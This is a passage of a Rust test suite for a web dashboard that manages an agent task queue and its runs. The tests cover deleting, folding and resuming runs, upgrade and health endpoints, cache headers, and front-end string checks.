7795 serde_json::json!([format!("{} (held)", root.short())])
7796 );
7797 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
7798 }
7799
7800 #[tokio::test]
7801 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
7802 let fx = Fixture::start().await;
7803 let q = fx.queue();
7804
7805 let mut t1 = Task::new(
7807 "Task 1".to_owned(),
7808 "Instruction 1".to_owned(),
7809 PathBuf::from("/repo"),
7810 Source::Human,
7811 );
7812 let run_id = "20260901-000000-r111";
7813 t1.runs.push(run_id.to_owned());
7814 write_run(&fx.runs(), run_id, RunStatus::Merged);
7815 q.put(&mut t1).expect("put t1");
7816
7817 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
7819 assert_eq!(res.status, 204);
7820 assert!(res.body.is_empty(), "204 No Content has no body");
7821 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
7822 assert!(
7823 fx.runs().join(run_id).exists(),
7824 "run directory must not be deleted when its task is deleted"
7825 );
7826
7827 let mut t2 = Task::new(
7829 "Task 2".to_owned(),
7830 "Instruction 2".to_owned(),
7831 PathBuf::from("/repo"),
7832 Source::Human,
7833 );
7834 t2.status = TaskStatus::Running;
7835 q.put(&mut t2).expect("put t2");
7836 let mut beat = crate::daemon::Status::new();
7837 beat.current = vec![crate::daemon::Current {
7838 task: t2.id.clone(),
7839 run: "20260901-000000-r222".to_owned(),
7840 }];
7841 beat.updated_at = jiff::Timestamp::now();
7842 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7843 .expect("publish a heartbeat");
7844 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
7845 assert_eq!(res.status, 409);
7846 assert!(
7847 res.json()["error"]
7848 .as_str()
7849 .unwrap()
7850 .contains("live daemon")
7851 );
7852 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
7853
7854 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
7860 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7861 .expect("leave a stale heartbeat");
7862 let mut t3 = Task::new(
7863 "Task 3".to_owned(),
7864 "Instruction 3".to_owned(),
7865 PathBuf::from("/repo"),
7866 Source::Human,
7867 );
7868 t3.status = TaskStatus::Running;
7869 q.put(&mut t3).expect("put t3");
7870 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
7871 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
7872 assert_eq!(res.status, 204);
7873 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
7874 assert!(
7875 q.claim(&t3.id).is_ok(),
7876 "the stale lock went with it, so the id is claimable again"
7877 );
7878
7879 let res = fx.delete("/api/queue/nonexistent").await;
7881 assert_eq!(res.status, 404);
7882 }
7883
7884 #[tokio::test]
7885 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
7886 let fx = Fixture::start().await;
7887 let runs = fx.runs();
7888
7889 let run_id = "20260901-000000-fold";
7891 let mut state = RunState::new(
7892 PathBuf::from("/repo"),
7893 "main".to_owned(),
7894 "abc".to_owned(),
7895 "instruction".to_owned(),
7896 Config::default(),
7897 );
7898 state.id = run_id.to_owned();
7899 state.status = RunStatus::Merged;
7900 state.candidates.push(crate::run::Candidate {
7901 index: 0,
7902 label: 'A',
7903 agent: "a".to_owned(),
7904 branch: "b".to_owned(),
7905 worktree: PathBuf::from("/w"),
7906 summary: String::new(),
7907 stat: String::new(),
7908 files: 1,
7909 commits: 1,
7910 empty: false,
7911 failed: None,
7912 verified_noop: None,
7913 duration_ms: 0,
7914 folded: true,
7915 });
7916 let dir = runs.join(run_id);
7917 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
7918 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
7919 .expect("write artifact");
7920 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
7921 .expect("write run.json");
7922
7923 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
7925 assert_eq!(res.status, 204);
7926 assert!(res.body.is_empty(), "204 has no body");
7927 assert!(!dir.exists(), "run directory and artifacts must be deleted");
7928
7929 let run_running = "20260901-000000-rung";
7934 write_run(&runs, run_running, RunStatus::Prep);
7935 let mut beat = crate::daemon::Status::new();
7936 beat.current = vec![crate::daemon::Current {
7937 task: "20260901-000000-task".to_owned(),
7938 run: run_running.to_owned(),
7939 }];
7940 beat.updated_at = jiff::Timestamp::now();
7941 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7942 .expect("publish a heartbeat");
7943 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
7944 assert_eq!(res.status, 409);
7945 assert!(
7946 res.json()["error"]
7947 .as_str()
7948 .unwrap()
7949 .contains("live daemon"),
7950 "the refusal must say who is holding it"
7951 );
7952 assert!(
7953 runs.join(run_running).exists(),
7954 "a run in flight keeps its directory"
7955 );
7956
7957 let run_unfolded = "20260901-000000-unfd";
7959 let mut state2 = RunState::new(
7960 PathBuf::from("/repo"),
7961 "main".to_owned(),
7962 "abc".to_owned(),
7963 "instruction".to_owned(),
7964 Config::default(),
7965 );
7966 state2.id = run_unfolded.to_owned();
7967 state2.status = RunStatus::Ready;
7968 state2.candidates.push(crate::run::Candidate {
7969 index: 0,
7970 label: 'A',
7971 agent: "a".to_owned(),
7972 branch: "b".to_owned(),
7973 worktree: PathBuf::from("/w"),
7974 summary: String::new(),
7975 stat: String::new(),
7976 files: 1,
7977 commits: 1,
7978 empty: false,
7979 failed: None,
7980 verified_noop: None,
7981 duration_ms: 0,
7982 folded: false,
7983 });
7984 let dir2 = runs.join(run_unfolded);
7985 std::fs::create_dir_all(&dir2).expect("create dir2");
7986 std::fs::write(
7987 dir2.join("run.json"),
7988 serde_json::to_string(&state2).unwrap(),
7989 )
7990 .expect("write run.json");
7991
7992 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
7993 assert_eq!(res.status, 409);
7994 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
7995 assert!(dir2.exists(), "unfolded run directory is kept");
7996
7997 let res = fx.delete("/api/runs/nonexistent").await;
7999 assert_eq!(res.status, 404);
8000 }
8001
8002 #[test]
8003 fn web_ui_delete_contract_in_front_end() {
8004 assert!(APP_JS.contains("deleteRun:"));
8006 assert!(APP_JS.contains("deleteTask:"));
8007
8008 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8010 ..APP_JS.find("function renderRuns").unwrap()];
8011 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8012
8013 assert!(APP_JS.contains("renderRunDelete"));
8015 assert!(APP_JS.contains("runDeleteReason"));
8016 assert!(APP_JS.contains("magi fold"));
8017 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8018
8019 assert!(APP_JS.contains("cancel.focus"));
8021 assert!(APP_JS.contains("armedRunDelete"));
8022 assert!(APP_JS.contains("armedDelete"));
8023
8024 assert!(APP_JS.contains("disabled: status === \"running\""));
8026 }
8027
8028 #[test]
8048 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8049 let build = APP_JS
8050 .find("function createRunCard")
8051 .expect("createRunCard exists");
8052 let update = APP_JS
8053 .find("function updateRunCard")
8054 .expect("updateRunCard exists");
8055 let end = APP_JS
8056 .find("function renderRuns")
8057 .expect("renderRuns exists");
8058
8059 let builder = &APP_JS[build..update];
8061 let open = builder.find("refs = {").expect("createRunCard sets refs");
8062 let literal = &builder[open + "refs = {".len()..];
8063 let close = literal.find('}').expect("the refs literal is closed");
8064 let published: HashSet<&str> = literal[..close]
8065 .split(',')
8066 .filter_map(|entry| entry.split(':').next())
8068 .map(str::trim)
8069 .filter(|name| !name.is_empty())
8070 .collect();
8071 assert!(
8072 published.len() > 5,
8073 "the refs literal did not parse into names: {published:?}"
8074 );
8075
8076 let mut used: Vec<&str> = Vec::new();
8079 let updaters = &APP_JS[update..end];
8080 for (at, _) in updaters.match_indices("r.") {
8081 let before = updaters[..at].chars().next_back();
8084 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8085 continue;
8086 }
8087 let rest = &updaters[at + 2..];
8088 let len = rest
8089 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8090 .unwrap_or(rest.len());
8091 if len > 0 {
8092 used.push(&rest[..len]);
8093 }
8094 }
8095 assert!(
8096 used.len() > 5,
8097 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8098 );
8099
8100 let missing: Vec<&str> = used
8101 .iter()
8102 .copied()
8103 .filter(|name| !published.contains(name))
8104 .collect();
8105 assert!(
8106 missing.is_empty(),
8107 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8108 never put in `refs` - every card will throw and the list will \
8109 render empty under a count line that says otherwise. Published: \
8110 {published:?}"
8111 );
8112 }
8113
8114 #[tokio::test]
8115 async fn folding_from_the_phone_reports_what_it_removed() {
8116 let fx = Fixture::start().await;
8117 let runs = fx.runs();
8118
8119 let id = "20260901-000000-fold";
8123 write_run(&runs, id, RunStatus::Stalled);
8124 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8125 assert_eq!(res.status, 200);
8126 assert_eq!(res.json()["removed_count"], 0);
8127 assert_eq!(res.json()["run"], id);
8128 assert!(
8129 runs.join(id).exists(),
8130 "a fold keeps the run's record; only the worktrees go"
8131 );
8132 }
8133
8134 #[tokio::test]
8135 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8136 let fx = Fixture::start().await;
8137 let runs = fx.runs();
8138 let wt = fx.home.path().join("wt").join("magi").join("dead");
8139 let id = "20260901-000000-dead";
8140 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8141 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8142 std::fs::create_dir_all(&wt).expect("worktree dir");
8143
8144 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8145 assert_eq!(res.status, 200, "{}", res.body);
8146 assert!(
8147 res.json()["removed_count"].as_u64().unwrap() > 0,
8148 "the worktree this build could not read a state for still went"
8149 );
8150 assert!(
8151 !runs.join(id).exists(),
8152 "an unreadable run has no candidate list to fold selectively, so \
8153 the whole record goes - same as `magi fold` on the CLI"
8154 );
8155 }
8156
8157 #[tokio::test]
8158 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8159 let fx = Fixture::start().await;
8160 let runs = fx.runs();
8161 let wt = fx.home.path().join("wt").join("magi").join("gone");
8162 let id = "20260901-000000-gone";
8163 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8164 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8165 std::fs::create_dir_all(&wt).expect("worktree dir");
8166
8167 let res = fx.delete(&format!("/api/runs/{id}")).await;
8168 assert_eq!(res.status, 204, "{}", res.body);
8169 assert!(!runs.join(id).exists(), "the broken record is gone");
8170 assert!(!wt.exists(), "its worktree is gone too");
8171 }
8172
8173 #[tokio::test]
8174 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8175 let fx = Fixture::start().await;
8176 let runs = fx.runs();
8177 let id = "20260901-000000-live";
8178 write_run(&runs, id, RunStatus::Implementing);
8179
8180 let mut beat = crate::daemon::Status::new();
8181 beat.current = vec![crate::daemon::Current {
8182 task: "20260901-000000-task".to_owned(),
8183 run: id.to_owned(),
8184 }];
8185 beat.updated_at = jiff::Timestamp::now();
8186 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8187 .expect("publish a heartbeat");
8188
8189 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8190 assert_eq!(res.status, 409);
8191 assert!(
8192 res.json()["error"]
8193 .as_str()
8194 .unwrap()
8195 .contains("live daemon"),
8196 "folding under a running agent would pull its worktree away"
8197 );
8198 }
8199
8200 #[tokio::test]
8201 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
8202 let fx = Fixture::start().await;
8203 let runs = fx.runs();
8204
8205 for (status, word) in [
8211 (RunStatus::Merged, "merged"),
8212 (RunStatus::Ready, "ready"),
8213 (RunStatus::Failed, "failed"),
8214 ] {
8215 let id = format!("20260901-000000-{}", &word[..4]);
8216 write_run(&runs, &id, status);
8217 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
8218 assert_eq!(res.status, 409, "{word} must not be resumable");
8219 let err = res.json()["error"].as_str().unwrap().to_owned();
8220 assert!(err.contains(word), "the refusal names the status: {err}");
8221 }
8222
8223 let mid = "20260901-000000-midf";
8228 write_run(&runs, mid, RunStatus::Reviewing);
8229 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
8230 assert_eq!(res.status, 202, "an interrupted run is resumable");
8231 }
8232
8233 #[tokio::test]
8234 async fn resume_is_refused_while_the_loop_is_running() {
8235 let fx = Fixture::start().await;
8236 let runs = fx.runs();
8237 let stalled = "20260901-000000-stal";
8238 write_run(&runs, stalled, RunStatus::Stalled);
8239
8240 let mut beat = crate::daemon::Status::new();
8244 beat.current = vec![crate::daemon::Current {
8245 task: "20260901-000000-task".to_owned(),
8246 run: "20260901-000000-othr".to_owned(),
8247 }];
8248 beat.updated_at = jiff::Timestamp::now();
8249 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8250 .expect("publish a heartbeat");
8251
8252 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
8253 assert_eq!(res.status, 409);
8254 let err = res.json()["error"].as_str().unwrap().to_owned();
8255 assert!(err.contains("othr"), "it names what the loop is on: {err}");
8256 assert!(err.contains("stop it first"), "{err}");
8257 }
8258
8259 #[test]
8260 fn a_run_cannot_be_resumed_twice_at_once() {
8261 let home = TempDir::new().expect("temp home");
8262 let ui = Ui::new(
8263 Queue::at(home.path().join("queue")),
8264 Questions::at(home.path().join("questions")),
8265 Talks::at(home.path().join("talks")),
8266 home.path().join("runs"),
8267 home.path().to_path_buf(),
8268 PathBuf::from("/repo"),
8269 )
8270 .with_worktrees_root(home.path().join("wt"));
8271 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
8272 let again = ui.begin_resume("20260901-000000-once");
8273 assert!(again.is_err(), "a second tap must not start a second graph");
8274 drop(first);
8275 assert!(
8276 ui.begin_resume("20260901-000000-once").is_ok(),
8277 "and the claim is released when the attempt ends"
8278 );
8279 }
8280
8281 #[test]
8282 fn talk_thinking_tracks_only_its_held_turn_claim() {
8283 let home = TempDir::new().expect("temp home");
8284 let ui = Ui::new(
8285 Queue::at(home.path().join("queue")),
8286 Questions::at(home.path().join("questions")),
8287 Talks::at(home.path().join("talks")),
8288 home.path().join("runs"),
8289 home.path().to_path_buf(),
8290 PathBuf::from("/repo"),
8291 )
8292 .with_worktrees_root(home.path().join("wt"));
8293 let id = "20260901-000000-once";
8294
8295 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
8296 let turn = ui.begin_talk_turn(id).expect("claim turn");
8297 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
8298 assert!(
8299 !ui.is_thinking("20260901-000000-other"),
8300 "one talk's turn does not make another talk busy"
8301 );
8302 drop(turn);
8303 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
8304 }
8305
8306 #[tokio::test]
8307 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
8308 let fx = Fixture::start().await;
8309 let mut beat = crate::daemon::Status::new();
8313 beat.pid = 4321;
8314 beat.updated_at = jiff::Timestamp::now();
8315 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8316 .expect("publish a heartbeat");
8317
8318 let res = fx.post("/api/upgrade", None).await;
8319 assert_eq!(res.status, 409);
8320 let err = res.json()["error"].as_str().unwrap().to_owned();
8321 assert!(err.contains("4321"), "the refusal names the owner: {err}");
8322 assert!(err.contains("old one against the same queue"), "{err}");
8323 }
8324
8325 #[test]
8332 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
8333 assert!(!should_spawn_recheck(&crate::config::Update {
8334 mode: UpdateMode::Off,
8335 interval: None,
8336 }));
8337
8338 unsafe {
8341 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8342 }
8343 let killed = should_spawn_recheck(&crate::config::Update {
8344 mode: UpdateMode::Notify,
8345 interval: None,
8346 });
8347 unsafe {
8348 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8349 }
8350 assert!(
8351 !killed,
8352 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
8353 one-time startup check"
8354 );
8355
8356 assert!(should_spawn_recheck(&crate::config::Update {
8357 mode: UpdateMode::Notify,
8358 interval: None,
8359 }));
8360 }
8361
8362 #[test]
8368 fn recheck_poll_period_tracks_a_short_configured_interval() {
8369 let short = crate::config::Update {
8370 mode: UpdateMode::Notify,
8371 interval: Some("1m".to_owned()),
8372 };
8373 let period = recheck_poll_period(&short);
8374 assert!(
8375 period <= Duration::from_secs(30),
8376 "a one-minute interval must wake the task far sooner than the \
8377 default ceiling, or the deck would not notice within the \
8378 interval the operator configured: got {period:?}"
8379 );
8380
8381 let default = crate::config::Update {
8382 mode: UpdateMode::Notify,
8383 interval: None,
8384 };
8385 assert_eq!(
8386 recheck_poll_period(&default),
8387 UPDATE_RECHECK_POLL_MAX,
8388 "the default day-long interval should poll at the (capped) \
8389 ceiling rather than needlessly often"
8390 );
8391 }
8392
8393 #[test]
8401 fn recheck_skips_the_network_before_the_interval_elapses() {
8402 let dir = TempDir::new().expect("temp dir");
8403 let path = dir.path().join("state.json");
8404 let state = kaishin::UpdateCheckState {
8405 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
8406 last_known_latest: None,
8407 last_known_url: None,
8408 };
8409 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
8410
8411 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
8412 assert!(
8413 !update_recheck_due(&checker, None),
8414 "a check made moments ago must not be repeated before the \
8415 configured interval elapses"
8416 );
8417 }
8418
8419 #[test]
8425 fn recheck_defers_to_an_upgrade_already_in_flight() {
8426 let dir = TempDir::new().expect("temp dir");
8427 let path = dir.path().join("state.json");
8428 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
8429 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
8430
8431 assert!(
8432 !update_recheck_due(&checker, Some(&progress)),
8433 "a recheck must not run while an upgrade this deck started is \
8434 still moving"
8435 );
8436 }
8437
8438 #[tokio::test]
8439 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
8440 unsafe {
8452 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8453 }
8454 let fx = Fixture::start().await;
8455 let res = fx.post("/api/upgrade", None).await;
8456 unsafe {
8457 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8458 }
8459 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8460 let body = res.json();
8461 assert!(body["to"].is_null(), "there was no release to move to");
8462 assert!(body["parked"].is_null(), "and nothing was parked");
8463 assert!(
8464 body["detail"]
8465 .as_str()
8466 .unwrap()
8467 .contains("disabled by MAGI_NO_AUTOUPDATE"),
8468 "{body:?}"
8469 );
8470 }
8471
8472 #[tokio::test]
8473 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
8474 let repo = TempDir::new().expect("repo dir");
8490 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8491 .expect("write magi.toml");
8492 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8493
8494 let res = fx.post("/api/upgrade", None).await;
8500 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8501 let body = res.json();
8502 assert!(body["to"].is_null(), "there was no release to move to");
8503 assert!(body["parked"].is_null(), "and nothing was parked");
8504 assert!(
8505 body["detail"]
8506 .as_str()
8507 .unwrap()
8508 .contains("nothing restarted"),
8509 "{body:?}"
8510 );
8511 }
8512
8513 #[tokio::test]
8514 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
8515 let repo = TempDir::new().expect("repo dir");
8520 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8521 .expect("write magi.toml");
8522 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8523
8524 let health = fx.get("/api/health").await.json();
8525 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
8526 assert_eq!(
8527 health["update"]["available"], false,
8528 "checking is off, which reads as \"unknown\", not \"none\""
8529 );
8530 assert!(health["update"]["to"].is_null());
8531 assert!(
8532 health["upgrade"].is_null(),
8533 "nothing has ever asked this deck to upgrade"
8534 );
8535 }
8536
8537 #[tokio::test]
8538 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
8539 let fx = Fixture::start().await;
8540 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
8541
8542 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8543 progress.parked_run = Some("20260905-000000-cd51".to_owned());
8544 progress.advance(crate::updater::Stage::Parking);
8545 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8546
8547 let health = fx.get("/api/health").await.json();
8548 assert_eq!(health["upgrade"]["stage"], "parking");
8549 assert_eq!(health["upgrade"]["from"], "0.5.1");
8550 assert_eq!(health["upgrade"]["to"], "0.5.2");
8551 let waiting_on = health["upgrade"]["waiting_on"]
8552 .as_str()
8553 .expect("waiting_on is set while parking a known run");
8554 assert!(waiting_on.contains("cd51"), "{waiting_on}");
8555 assert!(waiting_on.contains("implementing"), "{waiting_on}");
8556 }
8557
8558 #[tokio::test]
8559 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
8560 let fx = Fixture::start().await;
8561 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8562 progress.advance(crate::updater::Stage::Done);
8563 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8564
8565 let health = fx.get("/api/health").await.json();
8566 assert_eq!(health["upgrade"]["stage"], "done");
8567 assert!(
8568 health["upgrade"]["waiting_on"].is_null(),
8569 "nothing to wait on once it is done"
8570 );
8571 }
8572
8573 #[tokio::test]
8574 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
8575 let home = TempDir::new().expect("temp home");
8576 let runs = home.path().join("runs");
8577 std::fs::create_dir_all(&runs).expect("runs dir");
8578 let ui = Ui::new(
8579 Queue::at(home.path().join("queue")),
8580 Questions::at(home.path().join("questions")),
8581 Talks::at(home.path().join("talks")),
8582 runs,
8583 home.path().to_path_buf(),
8584 PathBuf::from("/repo/magi"),
8585 )
8586 .with_launch(launch_idle);
8587 let looping = ui.looping();
8588 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
8589 .await
8590 .expect("bind loopback");
8591 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
8592
8593 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8594 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
8595
8596 hand_over(home.path(), &looping, served, || Ok(()))
8597 .await
8598 .expect("hand over");
8599
8600 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
8601 assert_eq!(
8602 after.stage,
8603 crate::updater::Stage::Restarting,
8604 "hand_over owns the record through parking and up to restarting; \
8605 the successor is what finishes it"
8606 );
8607 }
8608
8609 #[test]
8610 fn the_upgrade_button_arms_before_it_restarts_anything() {
8611 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
8614 assert!(APP_JS.contains("Replace the binary and restart?"));
8615 assert!(APP_JS.contains("function confirmed("));
8616 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
8621 assert!(
8625 APP_JS.contains("Parking, then restarting"),
8626 "the button says what it is waiting for"
8627 );
8628 assert!(APP_JS.contains("if (!out.to)"));
8631 }
8632
8633 #[test]
8634 fn stopping_the_loop_arms_but_starting_does_not() {
8635 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
8638 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
8639 assert!(APP_JS.contains("confirmed(button, question)"));
8640 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
8643 assert!(APP_JS.contains("const label = btn.textContent;"));
8644 assert!(!APP_JS.contains("Neither direction is guarded"));
8645 }
8646
8647 #[test]
8648 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
8649 assert!(
8650 APP_JS.contains("state.health.version"),
8651 "the operator wants to know what is running even with nothing newer"
8652 );
8653 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
8654 }
8655
8656 #[test]
8657 fn the_upgrade_button_names_its_destination() {
8658 assert!(
8659 APP_JS.contains("`Update to ${update.to}`"),
8660 "pressing the button should not be a surprise about what it moves to"
8661 );
8662 }
8663
8664 #[test]
8665 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
8666 for stage in ["downloading", "replaced", "parking", "restarting"] {
8667 assert!(
8668 APP_JS.contains(&format!("\"{stage}\"")),
8669 "the phone must be able to tell {stage} apart from the others"
8670 );
8671 }
8672 assert!(APP_JS.contains(".waiting_on"));
8673 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
8678 assert!(APP_JS.contains("reconnects on its own"));
8679 }
8680
8681 #[test]
8682 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
8683 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
8692 ..APP_JS.find("function upgrade(").expect("upgrade")];
8693 assert!(
8694 !body.contains(
8695 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
8696 ),
8697 "a failed upgrade must not take the whole strip over the way it used to"
8698 );
8699 assert!(
8700 body.contains("upgradeFailNote"),
8701 "the failure has to reach the loop's own note instead"
8702 );
8703 assert_eq!(
8707 body.matches("upgradeFailNote].filter(Boolean).join")
8708 .count(),
8709 2,
8710 "both loop-why writers (quiet and control) must fold the note in"
8711 );
8712 }
8713
8714 #[test]
8715 fn an_overdue_upgrade_eventually_asks_for_a_human() {
8716 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
8719 assert!(APP_JS.contains("function upgradeOverdue("));
8720 }
8721
8722 #[test]
8723 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
8724 assert!(
8725 APP_JS.contains("Updated to ${upgradeInfo.to"),
8726 "the operator who asked for the restart wants to know it worked"
8727 );
8728 }
8729
8730 #[test]
8731 fn an_error_is_visible_from_where_the_button_is() {
8732 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
8737 ..APP_CSS.find(".alert-text").expect(".alert-text")];
8738 assert!(
8739 alert.contains("position: fixed"),
8740 "an error about the thing under your thumb has to be visible from \
8741 where your thumb is: {alert}"
8742 );
8743 assert!(
8744 alert.contains("z-index: 25"),
8745 "above the dock (20) and the run-actions FAB (15), so neither \
8746 buries it: {alert}"
8747 );
8748 assert!(
8749 alert.contains("var(--tap)"),
8750 "and clear of the dock and the home indicator: {alert}"
8751 );
8752 assert!(
8755 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
8756 "the FAB's column stays free: {alert}"
8757 );
8758 }
8759
8760 #[tokio::test]
8761 async fn an_older_attempt_says_what_replaced_it() {
8762 let fx = Fixture::start().await;
8763 let q = fx.queue();
8764 let runs = fx.runs();
8765 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
8766 write_run(&runs, first, RunStatus::Stalled);
8767 write_run(&runs, second, RunStatus::Blocked);
8768
8769 let mut t = Task::new(
8770 "one task".to_owned(),
8771 "do it".to_owned(),
8772 PathBuf::from("/repo"),
8773 Source::Human,
8774 );
8775 t.runs = vec![first.to_owned(), second.to_owned()];
8776 q.put(&mut t).expect("put");
8777
8778 let rows = fx.get("/api/runs").await.json();
8782 let by = |short: &str| -> Value {
8783 rows.as_array()
8784 .unwrap()
8785 .iter()
8786 .find(|r| r["short"] == short)
8787 .cloned()
8788 .unwrap_or(Value::Null)
8789 };
8790 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
8791 assert!(
8792 by("bbbb")["superseded_by"].is_null(),
8793 "the latest attempt is not superseded by anything"
8794 );
8795 assert!(APP_JS.contains("run.superseded_by"));
8797 assert!(APP_JS.contains("Superseded by"));
8798 }
8799
8800 #[tokio::test]
8801 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
8802 let fx = Fixture::start().await;
8803 let js = fx.get("/app.js").await;
8809 assert_eq!(js.status, 200);
8810 let tag = js
8811 .header("etag")
8812 .expect("an etag to revalidate against")
8813 .to_owned();
8814 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
8815 assert_eq!(
8816 js.header("cache-control"),
8817 Some("no-cache, must-revalidate"),
8818 "the phone has to ask every time"
8819 );
8820
8821 let again = fx
8824 .get_with("/app.js", &[("if-none-match", tag.as_str())])
8825 .await;
8826 assert_eq!(
8827 again.status, 304,
8828 "a deck it already has costs one round trip"
8829 );
8830 assert!(again.body.is_empty(), "304 carries no body");
8831
8832 let weak = fx
8835 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
8836 .await;
8837 assert_eq!(weak.status, 304);
8838 let stale = fx
8839 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
8840 .await;
8841 assert_eq!(stale.status, 200, "an older build must be replaced");
8842 assert!(stale.body.contains("renderRunActions"));
8843 }
8844
8845 #[test]
8846 fn the_deck_never_sends_the_operator_to_a_terminal() {
8847 assert!(
8850 !APP_JS.contains("Run `magi fold` first"),
8851 "the deck must offer the fold, not prescribe a shell command"
8852 );
8853 assert!(APP_JS.contains("foldRun:"));
8854 assert!(APP_JS.contains("resumeRun:"));
